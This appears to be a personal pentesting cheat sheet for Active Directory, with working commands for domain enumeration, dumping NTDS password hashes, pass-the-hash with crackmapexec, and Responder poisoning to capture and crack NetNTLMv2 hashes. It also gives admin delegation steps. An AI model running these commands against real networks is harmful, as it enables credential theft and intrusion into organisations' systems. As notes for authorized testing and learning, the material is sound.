Active Directory Pentesting

Last modified: 2023-07-19

Active Directory Privilege Escalation Windows

Active Directory (AD) is a directory service developed by Microsoft for Windows domain networks.


Seatbelt (GhostPack) is a C# host-enumeration tool that collects security-relevant host and user configuration from a Windows machine you already have a foothold on.

From Outside

# Domain Controllers (DNS) discovery
dig @<target-ip> <domain-name> any
# Subdomain / virtual host discovery (FUZZ is replaced by each word of the list)
ffuf -u http://<target-ip>/ -H "Host: FUZZ.<domain-name>" -w subdomains.txt -mc 200,301,302,403
gobuster dns -d example.local -w subdomains.txt -t 25

# Dump password hashes offline from an exfiltrated ntds.dit and SYSTEM hive (the hive holds the boot key that decrypts ntds.dit)
impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL -outputfile hashes
# Each line of hashes.ntds is "domain\user:rid:lmhash:nthash:::". To keep only the LM:NT pair, cut fields 3 and 4 (field 4 alone for the NT hash).
cut -d: -f3,4 hashes.ntds > hashes.txt
# NT hashes can be used as-is for pass-the-hash against SMB, no cracking needed. For example,
crackmapexec smb <target-ip> -u <username> -H hashes.txt

From Inside

# List all users in the AD domain
net user /domain
# Specific user
net user <username> /domain
PS> Get-ADUser -Identity <username> -Server <dc-hostname> -Properties *
# Filters
PS> Get-ADUser -Filter 'Name -like "*michael"' -Server <dc-hostname> | Format-Table Name,SamAccountName -A

# List all groups of the AD domain
net group /domain
# Specific group
net group "<group>" /domain
PS> Get-ADGroup -Identity <group> -Server <dc-hostname> -Properties *
# List the group members
PS> Get-ADGroupMember -Identity <group> -Server <dc-hostname>

# List the password policy of the AD domain
net accounts /domain

# List AD objects
PS> $ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
PS> Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -IncludeDeletedObjects -Server <dc-hostname>

# Retrieve information about the given domain.
PS> Get-ADDomain -Server <dc-hostname>

# Change the password of the AD user
PS> Set-ADAccountPassword -Identity <username> -Server <dc-hostname> -OldPassword (ConvertTo-SecureString -AsPlainText "oldpass" -Force) -NewPassword (ConvertTo-SecureString -AsPlainText "newpass" -Force)

# SYSVOL - A share present on every DC that stores the Group Policy Objects (GPOs) and logon scripts. Any authenticated domain user can read it, so check the policy files and scripts for embedded credentials.
dir \\<domain>\SYSVOL\<domain>\Policies

Microsoft Management Console (mmc)

To browse the domain with the AD snap-ins in MMC, follow these instructions:

  1. Right-click on the Windows icon.
  2. Click "Run" and enter "mmc" then click "OK".
  3. In the MMC, click "File → Add or Remove Snap-ins".
  4. Add all three "Active Directory…" snap-ins (Domains and Trusts, Sites and Services, Users and Computers).
  5. Right-click on each "Active Directory…" snap-in in the left pane and select "Change Forest" (for Users and Computers, "Change Domain").
  6. Enter the target domain as the Root domain and click OK.
  7. Click on "View → Advanced Features".

Naming Convention

If we obtain a list of employee names (from OSINT or from the directory itself), we can derive likely usernames by applying the organisation's naming convention, which is usually visible from a few known accounts.
For instance,

john smith   -> jsmith, j.smith
michael pole -> mpole, m.pole

SSH Login with AD Credentials


Inject Credentials into Memory

# /netonly: the new process runs under the local account, but every network authentication (SMB, LDAP, Kerberos) uses the injected domain credentials.
# The password is not validated when runas starts; a wrong password only fails when a network resource is first accessed.
runas.exe /netonly /user:<domain>\<username> cmd.exe

DNS Configuration

# PowerShell
$dnsip = "<DC_IP>"
$index = Get-NetAdapter -Name 'Ethernet' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip

Now check that the adapter's DNS server is the DC and that the domain name resolves through it.


Basic Knowledge

User Management

  • Delegation

    In Active Directory, an administrator can delegate to another user the right to manage user accounts within an Organizational Unit (OU) without granting that user admin privileges.

    1. Setup

      1. Open "Active Directory Users and Computers".
      2. Right-click on the target OU and click "Delegate Control…". A new window will open.
      3. In the window, enter the username of the user to whom you want to delegate user management.
      4. Select the tasks the delegated user should be allowed to perform.
      5. Click OK.
    2. Manage Users

      1. Logon as the delegated user.

      2. For instance, to reset John's password, execute the following command in PowerShell and enter the new password at the prompt.

        Set-ADAccountPassword john -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
      3. The first time John logs on after that, he should choose his own password rather than keep the one you entered. To enforce that, execute the following command.

        Set-ADUser -ChangePasswordAtLogon $true -Identity john -Verbose
      4. Now when John logs on he will be prompted to set a new password.

Intercept NetNTLM Authentication

Start Responder to listen for LLMNR, NBT-NS and WPAD requests on the local segment and answer them (poisoning), so that victim hosts authenticate to us and leak NetNTLMv2 challenge-responses.

sudo responder -I <interface-like-eth0>

Leave Responder running until it captures some requests.
If you obtain a NetNTLMv2 hash (Responder prints it as user::DOMAIN:serverchallenge:NTProofStr:blob), crack it offline on your own machine. Unlike an NT hash, a NetNTLMv2 response cannot be used for pass-the-hash; it must be cracked (or relayed).

echo -n '<copied-NTLM-hash>' > hash.txt
john --format=netntlmv2 --wordlist=wordlist.txt hash.txt